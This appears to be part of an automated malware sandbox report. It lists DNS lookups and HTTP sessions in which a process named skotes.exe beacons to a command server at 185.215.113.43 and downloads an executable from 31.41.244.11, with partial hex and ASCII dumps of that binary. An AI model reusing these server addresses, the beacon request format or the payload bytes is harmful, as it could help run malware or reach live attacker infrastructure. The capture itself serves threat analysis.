                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.424920082 CET1.1.1.1192.168.2.100x9136No error (0)star-mini.c10r.facebook.com157.240.196.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.431107044 CET1.1.1.1192.168.2.100x28cdNo error (0)us-west1.prod.sumo.prod.webservices.mozgcp.net34.149.128.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.817603111 CET1.1.1.1192.168.2.100x26bNo error (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.818133116 CET1.1.1.1192.168.2.100x52f6No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.818133116 CET1.1.1.1192.168.2.100x52f6No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.818133116 CET1.1.1.1192.168.2.100x52f6No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:27.818133116 CET1.1.1.1192.168.2.100x52f6No error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.149194956 CET1.1.1.1192.168.2.100x1edfNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.149502039 CET1.1.1.1192.168.2.100x903fNo error (0)www.reddit.comreddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.149502039 CET1.1.1.1192.168.2.100x903fNo error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.149502039 CET1.1.1.1192.168.2.100x903fNo error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.149502039 CET1.1.1.1192.168.2.100x903fNo error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.149502039 CET1.1.1.1192.168.2.100x903fNo error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.246079922 CET1.1.1.1192.168.2.100x49a4No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.246079922 CET1.1.1.1192.168.2.100x49a4No error (0)dyna.wikimedia.org185.15.58.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.409360886 CET1.1.1.1192.168.2.100x256No error (0)reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.409360886 CET1.1.1.1192.168.2.100x256No error (0)reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.409360886 CET1.1.1.1192.168.2.100x256No error (0)reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.409360886 CET1.1.1.1192.168.2.100x256No error (0)reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.478511095 CET1.1.1.1192.168.2.100x1edfNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.531512022 CET1.1.1.1192.168.2.100x9c15No error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.540656090 CET1.1.1.1192.168.2.100xccf4No error (0)www.google.com142.250.181.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.540668964 CET1.1.1.1192.168.2.100x526No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.567709923 CET1.1.1.1192.168.2.100x39bNo error (0)dyna.wikimedia.org185.15.58.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:28.715786934 CET1.1.1.1192.168.2.100x9545No error (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:42.030308962 CET1.1.1.1192.168.2.100x7e78No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:42.030544043 CET1.1.1.1192.168.2.100x1a0eNo error (0)www.google.com142.250.181.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.933976889 CET1.1.1.1192.168.2.100xfa1aNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:43.933976889 CET1.1.1.1192.168.2.100xfa1aNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.088538885 CET1.1.1.1192.168.2.100xd708No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.088538885 CET1.1.1.1192.168.2.100xd708No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.300431013 CET1.1.1.1192.168.2.100x4177No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.300431013 CET1.1.1.1192.168.2.100x4177No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.480231047 CET1.1.1.1192.168.2.100xe522No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:44.480231047 CET1.1.1.1192.168.2.100xe522No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.808691025 CET1.1.1.1192.168.2.100x926No error (0)normandy.cdn.mozilla.netnormandy-cdn.services.mozilla.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.808691025 CET1.1.1.1192.168.2.100x926No error (0)normandy-cdn.services.mozilla.com35.201.103.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.878082991 CET1.1.1.1192.168.2.100xb733No error (0)services.addons.mozilla.org151.101.1.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.878082991 CET1.1.1.1192.168.2.100xb733No error (0)services.addons.mozilla.org151.101.193.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.878082991 CET1.1.1.1192.168.2.100xb733No error (0)services.addons.mozilla.org151.101.129.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:50.878082991 CET1.1.1.1192.168.2.100xb733No error (0)services.addons.mozilla.org151.101.65.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.033277988 CET1.1.1.1192.168.2.100x9a61No error (0)normandy-cdn.services.mozilla.com35.201.103.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.051851988 CET1.1.1.1192.168.2.100xb0b7No error (0)services.addons.mozilla.org151.101.129.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.051851988 CET1.1.1.1192.168.2.100xb0b7No error (0)services.addons.mozilla.org151.101.193.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.051851988 CET1.1.1.1192.168.2.100xb0b7No error (0)services.addons.mozilla.org151.101.1.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.051851988 CET1.1.1.1192.168.2.100xb0b7No error (0)services.addons.mozilla.org151.101.65.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.195625067 CET1.1.1.1192.168.2.100x9f81No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.195625067 CET1.1.1.1192.168.2.100x9f81No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.195625067 CET1.1.1.1192.168.2.100x9f81No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.195625067 CET1.1.1.1192.168.2.100x9f81No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.997504950 CET1.1.1.1192.168.2.100x2816No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:51.997504950 CET1.1.1.1192.168.2.100x2816No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.144243002 CET1.1.1.1192.168.2.100x78cNo error (0)a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.coma17.rackcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.144243002 CET1.1.1.1192.168.2.100x78cNo error (0)a17.rackcdn.coma17.rackcdn.com.mdc.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.144251108 CET1.1.1.1192.168.2.100x78cNo error (0)a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.coma17.rackcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:54.144251108 CET1.1.1.1192.168.2.100x78cNo error (0)a17.rackcdn.coma17.rackcdn.com.mdc.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:57.011554003 CET1.1.1.1192.168.2.100x656aNo error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:50:57.011687040 CET1.1.1.1192.168.2.100x9b6dNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        0192.168.2.1049848185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:05.446523905 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:06.778474092 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:06 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        1192.168.2.1049856185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:08.413150072 CET306OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39
                                                                                                                                                                                                                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.786029100 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:09 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 35 64 0d 0a 20 3c 63 3e 31 30 31 34 34 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 62 63 30 31 36 31 63 65 65 30 61 62 33 31 62 31 31 30 33 35 31 38 66 65 61 66 36 32 63 62 36 62 34 39 61 35 35 33 36 65 36 23 31 30 31 34 34 33 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 62 63 30 31 36 31 63 65 65 30 61 62 33 31 62 31 31 30 33 37 34 38 32 65 61 64 36 33 35 65 35 61 65 39 61 35 35 33 36 65 36 23 31 30 31 34 34 33 32 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 62 63 30 31 36 31 63 65 65 30 61 62 33 31 62 31 31 30 33 34 31 63 64 64 64 65 36 31 30 39 62 62 35 39 61 35 35 33 36 65 36 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: 45d <c>1014430001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc0161cee0ab31b1103518feaf62cb6b49a5536e6#1014431001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc0161cee0ab31b11037482ead635e5ae9a5536e6#1014432001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2bc0161cee0ab31b110341cddde6109bb59a5536e6#1014439001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb932ecb181be703b11d130340c9cbb74885b99a5536e6#1014440001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1014441001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1014442001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1014443001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1014444001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1014445001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e1 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.786041021 CET72INData Raw: 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 33 37 61 39 65 34 64 31 35 65 66 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 2384760ac02b4ded8abeee1fbc37a9e4d15ef02ab5e45425197d1aa1daaa8#<d>0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        2192.168.2.104985831.41.244.11807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:09.910969973 CET66OUTGET /files/7427009775/dwVrTdy.exe HTTP/1.1
                                                                                                                                                                                                                                                                                        Host: 31.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236073017 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:11 GMT
                                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                        Content-Length: 605696
                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 12 Dec 2024 15:01:11 GMT
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        ETag: "675afab7-93e00"
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236115932 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57
                                                                                                                                                                                                                                                                                        Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236128092 CET1236INData Raw: 4d 90 e8 f0 33 02 00 90 0f 57 c0 0f 11 45 b0 0f 57 c9 66 0f 7f 4d c0 41 b8 20 00 00 00 48 8d 15 f3 ab 07 00 48 8d 4d b0 e8 ca 33 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 06 00 00 00 48 8d 15 c1 ab 07 00 48 8d 4d d0 e8 a4 33 02
                                                                                                                                                                                                                                                                                        Data Ascii: M3WEWfMA HHM3WEWfMAHHM3WEWfMA HHM~3WEWfM AHHMX3WE0WfM@A HHM023WEPWfM`AHHMP3WEp
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236258984 CET1236INData Raw: 48 8d 15 d4 a7 07 00 48 8d 4d 70 e8 13 2f 02 00 90 0f 57 c0 0f 11 85 90 00 00 00 0f 57 c9 66 0f 7f 8d a0 00 00 00 41 b8 21 00 00 00 48 8d 15 68 a9 07 00 48 8d 8d 90 00 00 00 e8 e4 2e 02 00 90 0f 57 c0 0f 11 85 b0 00 00 00 0f 57 c9 66 0f 7f 8d c0
                                                                                                                                                                                                                                                                                        Data Ascii: HHMp/WWfA!HhH.WWfA HH.WWfA!H2H.WWfA H{HW.WWf A!HH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236269951 CET1236INData Raw: 8d 4c 24 20 e8 46 2a 02 00 90 0f 57 c0 0f 11 44 24 40 0f 57 c9 66 0f 7f 4c 24 50 41 b8 6d 00 00 00 48 8d 15 67 a6 07 00 48 8d 4c 24 40 e8 1d 2a 02 00 90 0f 57 c0 0f 11 44 24 60 0f 57 c9 66 0f 7f 4c 24 70 41 b8 06 00 00 00 48 8d 15 1e a7 07 00 48
                                                                                                                                                                                                                                                                                        Data Ascii: L$ F*WD$@WfL$PAmHgHL$@*WD$`WfL$pAHHL$`)WEWfMAmHHM)WEWfMAHHM)WEWfMAjHHM)WEWfMAHeHM\)
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236280918 CET672INData Raw: 06 00 48 83 c4 28 e9 3c 0e 04 00 48 8d 0d 19 db 06 00 e9 30 0e 04 00 48 8d 0d b1 da 06 00 e9 24 0e 04 00 48 8b 15 71 d6 08 00 4c 8d 05 2a cf 08 00 4c 89 05 6b d6 08 00 48 85 d2 74 13 48 8b 02 48 63 48 04 4c 89 44 11 50 4c 8b 05 53 d6 08 00 48 8b
                                                                                                                                                                                                                                                                                        Data Ascii: H(<H0H$HqL*LkHtHHcHLDPLSHTHtHHcHLDPH(HHH(H(AH/E3HxHH(H(xHHHH(_H(A
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236366987 CET1236INData Raw: 06 00 e9 a0 0b 04 00 48 83 ec 28 48 8d 0d 69 d5 08 00 e8 6c 01 04 00 48 8d 0d 3d da 06 00 48 83 c4 28 e9 80 0b 04 00 cc cc cc cc 48 8d 0d 39 da 06 00 e9 70 0b 04 00 cc cc cc cc 48 8d 05 81 e8 08 00 c3 cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89
                                                                                                                                                                                                                                                                                        Data Ascii: H(HilH=H(H9pHLD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHHH8_^][@SH HHHWHSHHH$HH [HyH
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236375093 CET1236INData Raw: cf e8 91 fd ff ff 48 8b 54 24 60 48 83 fa 0f 76 2e 48 ff c2 48 8b 4c 24 48 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 29 e8 b8 00 04 00 48 8d 05 b1 e2 06 00 48 89 07 0f 11 77 18 48 8b c7 0f 28
                                                                                                                                                                                                                                                                                        Data Ascii: HT$`Hv.HHL$HHHrH'HIH+HHw)HHwH($H_^[/)H\$WH HHHH t(HLH\$0HH _H\$WHPDHHL$ HHJHT$(HPHT$(
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236381054 CET1236INData Raw: 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 8b d1 48 8d 4c 24 30 e8 d0 ff ff ff 48 8d 54 24 20 48 8d 4c 24 40 0f 10 00 0f 29 44 24 20 e8 b9 fb ff ff 48 8d 15 2a 8f 08 00 48 8d 4c 24 40 e8 08 1e 04 00 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                                                        Data Ascii: HHxHL$0HT$ HL$@)D$ H*HL$@HHAHAHHHHHHL$ HHL$ @SH HHHWHSHHHCHHHHH [3
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.236448050 CET1236INData Raw: b6 0b 48 8b d7 e8 45 e5 03 00 88 03 48 ff c3 48 3b de 75 eb 48 8b 7c 24 40 48 8b c3 48 8b 5c 24 48 48 83 c4 20 5e c3 cc cc cc cc cc cc cc cc 0f b6 c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 49 8b c9 4c 2b c2 e8 1c 62 06
                                                                                                                                                                                                                                                                                        Data Ascii: HEHH;uH|$@HH\$HH ^@SH IIL+bHH [@SH HL$PIL+aHH [H\$WH HHHA ~HIyHIHK(HH@t0HtHH\$0H _H\$
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:11.356235981 CET1236INData Raw: 83 ec 60 48 8b 05 21 9c 08 00 48 33 c4 48 89 44 24 48 49 8b f9 49 8b f0 48 8b da 49 3b d0 0f 84 80 00 00 00 48 89 ac 24 90 00 00 00 48 8d 69 30 4c 89 74 24 58 45 33 f6 4c 89 7c 24 50 41 bf ff ff 00 00 0f 1f 84 00 00 00 00 00 0f b6 03 4c 8d 4c 24
                                                                                                                                                                                                                                                                                        Data Ascii: `H!H3HD$HIIHI;H$Hi0Lt$XE3L|$PALL$@AD$0HT$0Lt$@HL$8Hl$ uL$8HfAHHfOH;uL|$PLt$XH$HHL$HH3H`_^[@SH@HSH3HD$0ALI0LD$ HD$


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        3192.168.2.1049868185.215.113.43807820C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:14.896534920 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        Host: 185.215.113.43
                                                                                                                                                                                                                                                                                        Content-Length: 31
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Data Raw: 64 31 3d 31 30 31 34 34 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                        Data Ascii: d1=1014430001&unit=246122658369
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:16.236272097 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                        Date: Thu, 12 Dec 2024 15:48:16 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 4 <c>0


